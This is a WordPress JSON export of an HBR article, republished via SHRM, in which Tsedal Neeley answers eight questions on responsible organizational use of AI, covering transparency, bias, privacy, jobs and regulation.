{"id":156928,"date":"2023-05-23T21:21:25","date_gmt":"2023-05-23T21:21:25","guid":{"rendered":"https:\/\/www.shrm.org\/resourcesandtools\/hr-topics\/technology\/pages\/8-questions-about-using-ai-responsibly-answered.aspx"},"modified":"2023-05-23T21:21:25","modified_gmt":"2023-05-23T21:21:25","slug":"8-questions-about-using-ai-responsibly-answered","status":"publish","type":"post","link":"https:\/\/squarehr.com\/index.php\/2023\/05\/23\/8-questions-about-using-ai-responsibly-answered\/","title":{"rendered":"8 Questions About Using AI Responsibly, Answered"},"content":{"rendered":"<p><img decoding=\"async\" src=\"http:\/\/squarehr.com\/wp-content\/uploads\/2023\/05\/8-questions-about-using-ai-responsibly-answered.jpg\"><\/p>\n<p><em>Editor&#8217;s Note: SHRM has partnered with<\/em>&nbsp;<a href=\"https:\/\/hbr.org\/\">Harvard Business Review<\/a>&nbsp;<em>to bring you relevant articles on key HR topics and strategies.<\/em>&nbsp;<\/p>\n<p><span class=\"shrm-Style-ForceDropCap\">W<\/span>hile the question of how organizations can (and should) use AI&nbsp;<a href=\"https:\/\/hbr.org\/2017\/07\/the-business-of-artificial-intelligence\">isn&#8217;t a new one<\/a>, the stakes and urgency of finding answers have skyrocketed with the release of ChatGPT, Midjourney, and other generative AI tools. Everywhere, people are wondering:&nbsp;<em>How can we use AI tools to boost performance? Can we trust AI to make consequential decisions? 
Will AI take away my job?<\/em><\/p>\n<p>The power of the AI tools introduced by OpenAI, Microsoft, and Nvidia \u2014 and the pressure to compete in the market \u2014 make it inevitable that your organization will have to navigate the operational and ethical considerations of machine learning, large language models, and much more. And while many leaders are focused on operational challenges and disruptions, the ethical concerns are at least as \u2014 if not more \u2014 pressing. Given how regulation lags technological capabilities and how quickly the AI landscape is changing, the burden of ensuring that these tools are used safely and ethically falls to companies.<\/p>\n<p>In my work at the intersection of occupations, technology, and organizations, I&#8217;ve examined&nbsp;<a href=\"https:\/\/hbr.org\/2022\/05\/developing-a-digital-mindset\">how leaders can develop digital mindsets<\/a>&nbsp;and&nbsp;<a href=\"https:\/\/www.hbs.edu\/faculty\/Pages\/item.aspx?num=62442\" target=\"_blank\" rel=\"noopener noreferrer\">the dangers of biased large language models<\/a>. I have identified best practices for organizations&#8217; use of technology and amplified consequential issues that help ensure that AI implementations are ethical. To help you better identify how you and your company should be thinking about these issues \u2014 and make no mistake, you should be thinking about them \u2014 I collaborated with HBR to answer eight questions posed by readers on LinkedIn.<\/p>\n<p class=\"shrm-Element-Subtitle\">1. How should I prepare to introduce AI at my organization?<\/p>\n<p>To start, it&#8217;s important to recognize that the optimal way to work with AI is different from the way we&#8217;ve worked with other new technologies. In the past, most new tools simply enabled us to perform tasks more efficiently. People wrote with pens, then typewriters (which were faster), then computers (which were even faster). 
Each new tool allowed for more-efficient writing, but the general processes (drafting, revising, editing) remained largely the same.<\/p>\n<p>AI is different. It has a more substantial influence on our work and our processes because it&#8217;s able to find patterns that we can&#8217;t see and then use them to provide insights and analysis, predictions, suggestions, and even full drafts all on its own. So instead of thinking of AI as the tools we&nbsp;use, we should think of it as a set of&nbsp;<em>systems<\/em>&nbsp;with which we can collaborate.<\/p>\n<p>To effectively collaborate with AI at your organization, focus on three things:<\/p>\n<p><strong>First, ensure that everyone has a basic understanding of how digital systems work.<\/strong><\/p>\n<p>A digital mindset is a collection of attitudes and behaviors that help you to see new possibilities using data, technology, algorithms, and AI. You don&#8217;t have to become a programmer or a data scientist; you simply need to take a new and proactive approach to collaboration (learning to work across platforms), computation (asking and answering the right questions), and change (accepting that it is the only constant).&nbsp;<em>Everyone<\/em>&nbsp;in your organization should be working toward&nbsp;<a href=\"https:\/\/www.linkedin.com\/pulse\/developing-digital-mindset-following-30-rule-tsedal-neeley\/\">at least 30% fluency<\/a>&nbsp;in a handful of topics, such as systems&#8217; architecture, AI, machine learning, algorithms, AI agents as teammates, cybersecurity, and data-driven experimentation.<\/p>\n<p><strong>Second, make sure your organization is prepared for continuous adaptation and change.<\/strong><\/p>\n<p>Bringing in new AI requires employees to get used to processing new streams of data and content, analyzing them, and using their findings and outputs to develop a new perspective. Likewise, to use data and technology most efficiently, organizations need an integrated organizational structure. 
Your company needs to become less siloed and should build a centralized repository of knowledge and data to enable constant sharing and collaboration. Competing with AI not only requires incorporating today&#8217;s technologies but also being mentally and structurally prepared to adapt to future advancements. For example, individuals have begun incorporating generative AI (such as ChatGPT) into their daily routines, regardless of whether companies are prepared or willing to embrace its use.<\/p>\n<p><strong>Third, build AI into your operating model.<\/strong><\/p>\n<p>As my colleagues Marco Iansiti and Karim R. Lakhani have&nbsp;<a href=\"https:\/\/www.amazon.com\/Competing-Age-AI-Leadership-Algorithms-ebook\/dp\/B07MWCTNSD\">shown<\/a>, the structure of an organization mirrors the architecture of the technological systems within it, and vice versa. If tech systems are static, your organization will be static. But if they&#8217;re flexible, your organization will be flexible. This strategy played out successfully at Amazon. The company was having trouble sustaining its growth and its software infrastructure was &#8220;cracking under pressure,&#8221; according to Iansiti and Lakhani. So Jeff Bezos wrote a memo to employees announcing that all teams should route their data through &#8220;<a href=\"https:\/\/aws.amazon.com\/what-is\/api\/\">application programming interfaces<\/a>&#8221; (APIs), which allow various types of software to communicate and share data using set protocols. Anyone who didn&#8217;t would be fired. This was an attempt to break the inertia within Amazon&#8217;s tech systems \u2014 and it worked, dismantling data siloes, increasing collaboration, and helping to build the software- and data-driven operating model we see today. While you may not want to resort to a similar ultimatum, you should think about how the introduction of AI can \u2014 and should \u2014 change your operations for the better.<\/p>\n<p class=\"shrm-Element-Subtitle\">2. 
How can we ensure transparency in how AI makes decisions?<\/p>\n<p>Leaders need to recognize that it is not always possible to know how AI systems are making decisions. Some of the very characteristics that allow AI to quickly process huge amounts of data and perform certain tasks more accurately or efficiently than humans can also make it a black box: We can&#8217;t see how the output was produced. However, we can all play a role in increasing transparency and accountability in AI decision-making processes in two ways:<\/p>\n<p><strong>Recognize that AI is invisible and inscrutable and be transparent in presenting and using AI systems.<\/strong><\/p>\n<p>Callen Anthony, Beth A. Bechky, and Anne-Laure Fayard&nbsp;<a href=\"https:\/\/pubsonline.informs.org\/doi\/abs\/10.1287\/orsc.2022.1651?journalCode=orsc\">identify<\/a>&nbsp;invisibility and inscrutability as core characteristics that differentiate AI from prior technologies. It&#8217;s invisible because it often runs in the background of other technologies or platforms without users being aware of it; for every Siri or Alexa that people understand to be AI, there are many technologies, such as antilock brakes, that contain unseen AI systems. It&#8217;s inscrutable because, even for AI developers, it&#8217;s often impossible to understand how a model reaches an outcome, or even identify all the data points it&#8217;s using to get there \u2014 good, bad, or otherwise.<br \/>As AIs rely on progressively larger datasets, this becomes increasingly true. Consider large language models (LLMs) such as OpenAI&#8217;s ChatGPT or Microsoft&#8217;s Bing. 
They are trained on massive datasets of books, webpages, and documents scraped from across the internet&nbsp;\u2014&nbsp;OpenAI&#8217;s LLM has&nbsp;<a href=\"https:\/\/arxiv.org\/abs\/2005.14165\" target=\"_blank\" rel=\"noopener noreferrer\"><em>175 billion parameters<\/em><\/a>&nbsp;and was built to predict the&nbsp;<em>likelihood<\/em>&nbsp;that something will occur (a character, word, or string of words, or even an image or tonal shift in your voice) based on either its preceding or surrounding context. The autocorrect feature on your phone is an example of the accuracy \u2014 and inaccuracy \u2014 of such predictions. But it&#8217;s not just the size of the training data: Many AI algorithms are also self-learning; they keep refining their predictive powers as they get more data and user feedback, updating their parameters along the way.<\/p>\n<p>AIs often have broad capabilities&nbsp;<em>because&nbsp;<\/em>of invisibility and inscrutability \u2014 their ability to work in the background and find patterns beyond our grasp. Currently, there is no way to peer into the inner workings of an AI tool and guarantee that the system is producing accurate or fair output. We must acknowledge that some opacity is a cost of using these powerful systems. As a consequence, leaders should exercise careful judgment in determining when and how it&#8217;s appropriate to use AI, and they should document when and how AI is being used. 
That way people will know that an AI-driven decision was appraised with an appropriate level of skepticism, including its potential risks or shortcomings.<\/p>\n<p><strong>Prioritize explanation as a central design goal.<\/strong><\/p>\n<p>The research brief &#8220;<a href=\"https:\/\/workofthefuture.mit.edu\/wp-content\/uploads\/2020\/12\/2020-Research-Brief-Malone-Rus-Laubacher2.pdf\">Artificial Intelligence and the Future of Work,<\/a>&#8221; by MIT scientists, notes that AI models can become more transparent through practices like highlighting specific areas in data that contribute to AI output, building models that are more interpretable, and developing algorithms that can be used to probe how a different model works. Similarly, leading AI computer scientist Timnit Gebru and her colleagues Emily Bender, Angelina McMillan-Major, and Margaret Mitchell (credited as &#8220;Shmargaret Shmitchell&#8221;)&nbsp;<a href=\"https:\/\/doi.org\/10.1145\/3442188.3445922\">argue<\/a>&nbsp;that practices like premortem analyses that prompt developers to consider both project risks and potential alternatives to current plans can increase transparency in future technologies. Echoing this point, in March of 2023, prominent tech entrepreneurs Steve Wozniak and Elon Musk, along with employees of Google and Microsoft,&nbsp;<a href=\"https:\/\/futureoflife.org\/open-letter\/pause-giant-ai-experiments\/\">signed a letter<\/a>&nbsp;advocating for AI development to be more transparent and interpretable.<\/p>\n<p class=\"shrm-Element-Subtitle\">3. How can we erect guardrails around LLMs so that their responses are true and consistent with the brand image we want to project?<\/p>\n<p>LLMs come with several serious risks. 
They can:<\/p>\n<ul>\n<li><strong>perpetuate harmful bias<\/strong>&nbsp;by deploying negative stereotypes or minimizing minority viewpoints<\/li>\n<li><strong>spread misinformation<\/strong>&nbsp;by repeating falsehoods or making up facts and citations<\/li>\n<li><strong>violate privacy<\/strong>&nbsp;by using data without people&#8217;s consent<\/li>\n<li><strong>cause security breaches<\/strong>&nbsp;if they are used to generate phishing emails or other cyberattacks<\/li>\n<li><strong>harm the environment<\/strong>&nbsp;because of the significant computational resources required to train and run these tools<\/li>\n<\/ul>\n<p>Data curation and documentation are two ways to curtail those risks and ensure that LLMs will give responses that are more consistent with, not harmful to, your brand image.<\/p>\n<p><strong>Tailor data for appropriate outputs.<\/strong><\/p>\n<p>LLMs are often developed using internet-based data containing billions of words. However, common sources of this data, like Reddit and Wikipedia, lack sufficient mechanisms for checking accuracy, fairness, or appropriateness. Consider which perspectives are represented on these sites and which are left out. For example,&nbsp;<a href=\"https:\/\/academic.oup.com\/pnasnexus\/article\/2\/3\/pgad018\/7008465\" target=\"_blank\" rel=\"noopener noreferrer\">67% of Reddit&#8217;s contributors are male<\/a>. And on Wikipedia,&nbsp;<a href=\"https:\/\/meta.m.wikimedia.org\/wiki\/Community_Insights\/Community_Insights_2021_Report\/Thriving_Movement#Community_and_Newcomer_Diversity\">84% of contributors are male, with little representation from marginalized populations<\/a>.<br \/>If you instead build an LLM around more-carefully vetted sources, you reduce the risk of inappropriate or harmful responses. 
Bender and colleagues&nbsp;<a href=\"https:\/\/dl.acm.org\/doi\/10.1145\/3442188.3445922\" target=\"_blank\" rel=\"noopener noreferrer\">recommend curating training datasets<\/a>&nbsp;&#8220;through a thoughtful process of deciding what to put in, rather than aiming solely for scale and trying haphazardly to weed out\u2026&#8217;dangerous&#8217;, &#8216;unintelligible&#8217;, or &#8216;otherwise bad&#8217; [data].&#8221; While this might take more time and resources, it&nbsp;exemplifies the adage that an ounce of prevention is worth a pound of&nbsp;cure.<\/p>\n<p><strong>Document data.<\/strong><\/p>\n<p>There will surely be organizations that want to leverage LLMs but lack the resources to train a model with a curated dataset. In situations like this,&nbsp;<a href=\"https:\/\/direct.mit.edu\/tacl\/article\/doi\/10.1162\/tacl_a_00041\/43452\/Data-Statements-for-Natural-Language-Processing\" target=\"_blank\" rel=\"noopener noreferrer\">documentation is crucial<\/a>&nbsp;because it enables companies to get context from a nonproprietary model&#8217;s developers on which datasets it uses and the biases they may contain, as well as guidance on how software built on the model might be appropriately deployed. This practice is analogous to the standardized information used in medicine to indicate which studies have been used in making health care recommendations.<\/p>\n<p>AI developers should prioritize documentation to allow for safe and transparent use of their models. And people or organizations experimenting with a model must look for this documentation to understand its risks and whether it aligns with their desired brand image.<\/p>\n<p class=\"shrm-Element-Subtitle\">4. 
How can we ensure that the dataset we use to train AI models is representative and doesn&#8217;t include harmful biases?<\/p>\n<p>Sanitizing datasets is a challenge that your organization can help overcome by prioritizing transparency and fairness over model size and by representing diverse populations in data curation.<\/p>\n<p>First, consider the trade-offs you make. Tech companies have been pursuing larger AI systems because they tend to be more effective at certain tasks, like sustaining human-seeming conversations. However, if&nbsp;a model is too large to fully understand, it&#8217;s impossible to rid it of potential biases. To fully combat harmful bias, developers must be able to understand and document the risks inherent to a dataset, which might mean using a smaller one.<\/p>\n<p>Second, if diverse teams, including members of underrepresented populations, collect and produce the data used to train models, then you&#8217;ll have a better chance of ensuring that people with a variety of perspectives and identities are represented in them. This practice also helps to identify unrecognized biases or blinders in the data.<\/p>\n<p>AI will only be trustworthy once it works equitably, and that will only happen if we prioritize diversifying data and development teams and clearly document how AI has been designed for fairness.<\/p>\n<p class=\"shrm-Element-Subtitle\">5. What are the potential risks of data privacy violations with AI?<\/p>\n<p>AI that uses sensitive employee and customer data is vulnerable to bad actors. To combat these risks, organizations should learn as much as they can about how their AI has been developed and then decide whether it&#8217;s appropriate to use secure data with it. They should also&nbsp;<a href=\"https:\/\/www.amazon.com\/Digital-Mindset-Really-Thrive-Algorithms\/dp\/1647820103\" target=\"_blank\" rel=\"noopener noreferrer\">keep tech systems updated and earmark budget resources to keep the software secure<\/a>. 
This requires continuous action, as a small vulnerability can leave an entire organization open to breaches.<\/p>\n<p>Blockchain innovations can help on this front. A blockchain is a secure, distributed ledger that records data transactions, and it&#8217;s currently being used for applications like creating payment systems (not to mention cryptocurrencies).<\/p>\n<p>When it comes to your operations more broadly, consider this&nbsp;<a href=\"https:\/\/gpsbydesign.org\/\" target=\"_blank\" rel=\"noopener noreferrer\">privacy by design (PbD) framework<\/a>&nbsp;from former Information and Privacy Commissioner of Ontario Ann Cavoukian, which recommends that organizations embrace seven foundational principles:<\/p>\n<ol>\n<li>Be proactive, not reactive \u2014 preventative, not remedial.<\/li>\n<li>Lead with privacy as the default setting.<\/li>\n<li>Embed privacy into design.<\/li>\n<li>Retain full functionality, including privacy and security.<\/li>\n<li>Ensure end-to-end security.<\/li>\n<li>Maintain visibility and transparency.<\/li>\n<li>Respect user privacy \u2014 keep systems user-centric.<\/li>\n<\/ol>\n<p>Incorporating PbD principles into your operation requires more than hiring privacy personnel or creating a privacy division. All the people in&nbsp;your organization need to be attuned to customer and employee concerns about these issues. Privacy isn&#8217;t an afterthought; it needs to be&nbsp;at the core of digital operations, and everyone needs to work to protect it.<\/p>\n<p class=\"shrm-Element-Subtitle\">6.&nbsp;How can we encourage employees to use AI for productivity purposes and not simply to take shortcuts?<\/p>\n<p>Even with the advent of LLMs, AI technology is not yet capable of performing the dizzying range of tasks that humans can, and there are many things that it does worse than the average person. Using each new tool effectively requires understanding its purpose.<\/p>\n<p>For example, think about ChatGPT. 
By learning about language patterns, it has become so good at predicting which words are supposed to follow others that it can produce seemingly sophisticated text responses to complicated questions. However, there&#8217;s a limit to the quality of these outputs because being good at guessing plausible combinations of words and phrases is different from understanding the material. So ChatGPT can produce a poem in the style of Shakespeare because it has learned the particular patterns of his plays and poems, but it cannot produce the original insight into the human condition that informs his work.<\/p>\n<p>By contrast, AI can be better and more efficient than humans at making predictions because it can process much larger amounts of data much more quickly. Examples include&nbsp;<a href=\"https:\/\/journals.plos.org\/digitalhealth\/article?id=10.1371\/journal.pdig.0000168\">predicting early dementia from speech patterns<\/a>,&nbsp;<a href=\"https:\/\/pubmed.ncbi.nlm.nih.gov\/30295070\/\" target=\"_blank\" rel=\"noopener noreferrer\">detecting cancerous tumors indistinguishable to the human eye<\/a>, and&nbsp;<a href=\"https:\/\/www.researchgate.net\/publication\/312212729_Humans_and_Autonomy_Implications_of_Shared_Decision-Making_for_Military_Operations_Humans_and_Autonomy_Implications_of_Shared_Decision-Making_for_Military_Operations\">planning safer routes through battlefields<\/a>.<\/p>\n<p>Employees should therefore be encouraged to evaluate whether AI&#8217;s strengths match up to a task and proceed accordingly. If you need to process a lot of information quickly, it can do that. If you need a bunch of new ideas, it can generate them. Even if you need to make a difficult decision, it can offer advice, providing it&#8217;s been trained on relevant data.<\/p>\n<p>But you shouldn&#8217;t use AI to create meaningful work products without human oversight. 
If you need to write a quantity of documents with very similar content, AI may be a useful generator of what has long been referred to as boilerplate material.&nbsp;<a href=\"https:\/\/www.oneusefulthing.org\/p\/how-to-use-ai-to-do-practical-stuff\">Be aware<\/a>&nbsp;that its outputs are derived from its datasets and algorithms, and they aren&#8217;t necessarily good or accurate.<\/p>\n<p class=\"shrm-Element-Subtitle\">7.&nbsp;How worried should we be that AI will replace jobs?<\/p>\n<p>Every technological revolution has created more jobs than it has destroyed. Automobiles put horse-and-buggy drivers out of business but led to new jobs building and fixing cars, running gas stations, and more. The novelty of AI technologies makes it easy to fear they will replace humans in the workforce. But we should instead view them as ways to augment human performance. For example, companies like&nbsp;<a href=\"https:\/\/collectivei.com\/\">Collective[i]<\/a>&nbsp;have developed AI systems that analyze data to produce highly accurate sales forecasts quickly; traditionally, this work took people days and weeks to pull together. But no salespeople are losing their jobs. Rather, they&#8217;ve got more time to focus on more important parts of their work: building relationships, managing, and actually selling.<\/p>\n<p>Similarly, services like OpenAI&#8217;s Codex can autogenerate programming code for basic purposes. This doesn&#8217;t replace programmers; it allows them to write code more efficiently and automate repetitive tasks like testing so that they can work on higher-level issues such as systems architecture, domain modeling, and user experience.<\/p>\n<p>The long-term effects on jobs are complex and uneven, and there can be periods of job destruction and displacement in certain industries or regions. 
To ensure that the benefits of technological progress are widely shared, it is crucial to invest in education and workforce development to help people adapt to the new job market.<\/p>\n<p>Individuals and organizations should focus on upskilling and reskilling to prepare to make the most of new technologies. AI and robots aren&#8217;t replacing humans anytime soon.&nbsp;<a href=\"https:\/\/www.amazon.com\/dp\/B099KQLCWY\/ref=dp-kindle-redirect?_encoding=UTF8&amp;btkr=1\" target=\"_blank\" rel=\"noopener noreferrer\">The more likely reality is that people with digital mindsets will replace those without them<\/a>.<\/p>\n<p class=\"shrm-Element-Subtitle\">8.&nbsp;How can my organization ensure that the AI we develop or use won&#8217;t harm individuals or groups or violate human rights?<\/p>\n<p>The harms of AI bias have been widely documented. In their seminal 2018 paper &#8220;<a href=\"https:\/\/proceedings.mlr.press\/v81\/buolamwini18a.html\">Gender Shades<\/a>,&#8221; Joy Buolamwini and Timnit Gebru showed that popular facial recognition technologies offered by companies like IBM and Microsoft were nearly perfect at identifying white, male faces but misidentified Black female faces as much as 35% of the time. 
Facial recognition can be used to unlock your phone, but is also used to&nbsp;<a href=\"https:\/\/www.nytimes.com\/2022\/12\/22\/nyregion\/madison-square-garden-facial-recognition.html\" target=\"_blank\" rel=\"noopener noreferrer\">monitor patrons at Madison Square Garden<\/a>,&nbsp;<a href=\"https:\/\/www.reuters.com\/investigates\/special-report\/ukraine-crisis-russia-detentions\/\">surveil<\/a>&nbsp;<a href=\"https:\/\/www.nbcmiami.com\/investigations\/miami-police-used-facial-recognition-technology-in-protesters-arrest\/2278848\/\" target=\"_blank\" rel=\"noopener noreferrer\">protesters<\/a>, and tap suspects in police investigations \u2014 and misidentification has&nbsp;<a href=\"https:\/\/www.wired.com\/story\/wrongful-arrests-ai-derailed-3-mens-lives\/\" target=\"_blank\" rel=\"noopener noreferrer\">led to wrongful arrests<\/a>&nbsp;that can derail people&#8217;s lives. As AI grows in power and becomes more integrated into our daily lives, its potential for harm grows exponentially, too. Here are strategies to safeguard AI.<\/p>\n<p><strong>Slow down and document AI development.<\/strong><\/p>\n<p>Preventing AI harm requires shifting our focus from the rapid development and deployment of increasingly powerful AI to ensuring that AI is safe before release.<\/p>\n<p>Transparency is also key. Earlier in this article, I explained how clear descriptions of the datasets used in AI and potential biases within them&nbsp;help to reduce harm. When algorithms are openly shared, organizations and individuals can better analyze and understand the potential risks of new tools before using them.<\/p>\n<p><strong>Establish and protect AI ethics watchdogs.<\/strong><\/p>\n<p>The question of who will ensure safe and responsible AI is currently unanswered. Google, for example, employs an ethical-AI team, but in 2020 it fired Gebru after she sought to publish a paper warning of the risks of building ever-larger language models. 
Her exit from Google raised the question of whether tech developers are able, or incentivized, to act as ombudsmen for their own technologies and organizations. More recently, an entire team at Microsoft focused on ethics&nbsp;<a href=\"https:\/\/techcrunch.com\/2023\/03\/13\/microsoft-lays-off-an-ethical-ai-team-as-it-doubles-down-on-openai\/\">was laid off<\/a>. But many in the industry recognize the risks, and as noted earlier, even tech icons have called for policymakers working with technologists to create regulatory systems to govern AI development.<\/p>\n<p>Whether it comes from government, the tech industry, or another independent system, the establishment and protection of watchdogs is crucial to protecting against AI harm.<\/p>\n<p><strong>Watch where regulation is headed.<\/strong><\/p>\n<p>Even as the AI landscape changes, governments are trying to regulate it. In the United States, 21 AI-related bills were passed into law last year.&nbsp;<a href=\"https:\/\/aiindex.stanford.edu\/wp-content\/uploads\/2023\/04\/HAI_AI-Index-Report_2023.pdf\">Notable acts<\/a>&nbsp;include an Alabama provision outlining guidelines for using facial recognition technology in criminal proceedings and legislation that created a Vermont Division of Artificial Intelligence to review all AI used by the state government and to propose a state AI code of ethics. More recently, the U.S. federal government&nbsp;<a href=\"https:\/\/www.axios.com\/2023\/05\/04\/ai-executive-actions-white-house\">moved to enact executive actions on AI<\/a>, which will be vetted over time.<\/p>\n<p>The European Union is also considering legislation \u2014 the Artificial Intelligence Act \u2014 that includes a classification system determining the level of risk AI could pose to the health and safety or the fundamental rights of a person. Italy has temporarily banned ChatGPT. 
The African Union has established a working group on AI, and the African Commission on Human and Peoples&#8217; Rights&nbsp;<a href=\"https:\/\/ai.altadvisory.africa\/wp-content\/uploads\/AI-Governance-in-Africa-2022.pdf\">adopted a resolution<\/a>&nbsp;to address implications for human rights of AI, robotics, and other new and emerging technologies in Africa.<\/p>\n<p>China passed a data protection law in 2021 that established user consent rules for data collection and&nbsp;<a href=\"https:\/\/www.cnbc.com\/2022\/12\/23\/china-is-bringing-in-first-of-its-kind-regulation-on-deepfakes.html\">recently passed<\/a>&nbsp;a unique policy regulating &#8220;deep synthesis technologies&#8221; that are used for so-called &#8220;deep fakes.&#8221; The British government&nbsp;<a href=\"https:\/\/www.cnbc.com\/2023\/03\/29\/with-chatgpt-hype-swirling-uk-government-urges-regulators-to-come-up-with-rules-for-ai.html\" target=\"_blank\" rel=\"noopener noreferrer\">released an approach<\/a>&nbsp;that applies existing regulatory guidelines to new AI technology.<\/p>\n<p>Billions of people around the world are discovering the promise of AI through their experiments with ChatGPT, Bing, Midjourney, and other new tools. Every company will have to confront questions about how these emerging technologies will apply to them and their industries. For&nbsp;some it will mean a significant pivot in their operating models; for others, an opportunity to scale and broaden their offerings. But all must assess their readiness to deploy AI responsibly without perpetuating harm to their stakeholders and the world at large.<\/p>\n<p><a href=\"https:\/\/hbr.org\/search?term=tsedal%20neeley&amp;search_type=search-all\"><strong>Tsedal Neeley<\/strong><\/a>&nbsp;is the Naylor Fitzhugh Professor of Business Administration and senior associate dean of faculty and research at Harvard Business School. 
She is the coauthor of the book&nbsp;<a href=\"https:\/\/www.amazon.com\/Digital-Mindset-Really-Thrive-Algorithms\/dp\/1647820103\" target=\"_blank\" rel=\"noopener noreferrer\"><em>The Digital Mindset: What It Really Takes to Thrive in the Age of Data, Algorithms, and AI<\/em><\/a>&nbsp;and the author of the book&nbsp;<a href=\"https:\/\/www.amazon.com\/Remote-Work-Revolution-Succeeding-Anywhere\/dp\/0063068303\"><em>Remote Work Revolution: Succeeding from Anywhere<\/em><\/a>.&nbsp;<\/p>\n<p><em>This article is adapted from<\/em>&nbsp;Harvard Business Review&nbsp;<em>with permission. \u00a92023. All rights reserved.<\/em><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Editor&#8217;s Note: SHRM has partnered with&nbsp;Harvard Business Review&nbsp;to bring you
relevant articles on key HR topics and strategies.&nbsp; While the question of how organizations can (and should) use AI&nbsp;isn&#8217;t a new one, the stakes and urgency of finding answers have skyrocketed with the release of ChatGPT, Midjourney, and other generative AI tools. Everywhere, people are [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":156929,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[363,323],"tags":[],"class_list":["post-156928","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hr-news","category-technology-strategies"],"_links":{"self":[{"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/posts\/156928","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/comments?post=156928"}],"version-history":[{"count":0,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/posts\/156928\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/media\/156929"}],"wp:attachment":[{"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/media?parent=156928"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/categories?post=156928"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/tags?post=156928"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}